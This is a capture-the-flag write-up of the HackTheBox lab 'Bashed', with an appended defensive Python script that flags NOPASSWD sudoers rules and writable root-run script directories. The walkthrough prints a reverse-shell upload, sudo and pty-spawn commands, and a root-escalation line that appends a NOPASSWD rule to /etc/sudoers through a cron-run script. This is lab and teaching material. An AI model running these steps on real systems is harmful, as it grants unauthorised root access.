
Bashed

 ·  ☕ 1 min read  ·  ✍️ M4t35Z
Name: Bashed
IP: 10.10.10.68
OS: Linux
Points: Easy (20)

recon

nmap(fast)
nmap(big)

Web


http://10.10.10.68/dev/phpbash.php
We need a php-reverse-shell.php to be uploaded
Let's upload it to the /uploads dir and go there from the browser while you're listening with nc :D

BOOM We got a shell as www-data xD

sudo -l

We could run /bin/bash as user scriptmanager without any password on the box

sudo -u scriptmanager /bin/bash
python -c 'import pty;pty.spawn("/bin/bash")'
cat /home/arrexel/user.txt

We got our shell as scriptmanager and we have the user.txt btw

Linpeas

/scripts/test.txt
That's a weird dir lul

Gettin root

cd /scripts
vi /scripts/test.py

now the full key combo on this shit terminal like a REAL blind vim elitist:

Go
os.system('echo "scriptmanager ALL=NOPASSWD: /bin/bash" >> /etc/sudoers')
<ctrl+v><esc>:wq

I meant <shift>+g (go to the last line of the file) -> o (make a new line) -> <ctrl>+v (paste the cmd u want) -> <escape> (gettin into normal mode) -> :wq (command mode save and quit)

Wait 1 min for test.py to get run as root, then run sudo /bin/bash

Got root and the root flag btw
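
An added example (not part of the original writeup or of the box): a defender-side check for the two weaknesses used above, NOPASSWD sudo rules and a script directory that a non-root user can write to while a root job runs its contents. The sample sudoers text is constructed, and `nopasswd_rules`, `audit_script_dir` and `trusted_uid` are names made up for this example.

```python
import os
import re
import stat

# Constructed sample: the www-data rule matches what this writeup describes from
# `sudo -l`, the scriptmanager rule is the line appended to /etc/sudoers above.
SAMPLE_SUDOERS = """\
# constructed sample, not copied from the box
root ALL=(ALL:ALL) ALL
www-data ALL=(scriptmanager) NOPASSWD: /bin/bash
scriptmanager ALL=NOPASSWD: /bin/bash
"""

NOPASSWD = re.compile(r"^\s*([^#\s]\S*)\s+.*NOPASSWD\s*:\s*(.+)$")

def nopasswd_rules(sudoers_text):
    """Return (who, commands) for each NOPASSWD rule in sudoers-format text."""
    hits = (NOPASSWD.match(line) for line in sudoers_text.splitlines())
    return [(m.group(1), m.group(2).strip()) for m in hits if m]

def audit_script_dir(path, trusted_uid=0):
    """Return (entry, reason) pairs for entries under `path` that someone other
    than `trusted_uid` may be able to change. Assumes a job running as
    `trusted_uid` executes what is in `path`. Group-writable entries are
    flagged conservatively, without checking who is in the group."""
    findings = []
    entries = [path] + [os.path.join(root, name)
                        for root, dirs, files in os.walk(path)
                        for name in dirs + files]
    for entry in entries:
        st = os.lstat(entry)
        if stat.S_ISLNK(st.st_mode):
            findings.append((entry, "symlink (target not checked)"))
            continue
        if st.st_uid != trusted_uid:
            findings.append((entry, "owned by uid %d" % st.st_uid))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((entry, "group/world-writable"))
    return findings

if __name__ == "__main__":
    for who, cmds in nopasswd_rules(SAMPLE_SUDOERS):
        print("NOPASSWD rule: %s -> %s" % (who, cmds))
    # Audit /scripts when it exists, otherwise the current directory.
    target = "/scripts" if os.path.isdir("/scripts") else "."
    for entry, reason in audit_script_dir(target):
        print("%s: %s" % (entry, reason))
```
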
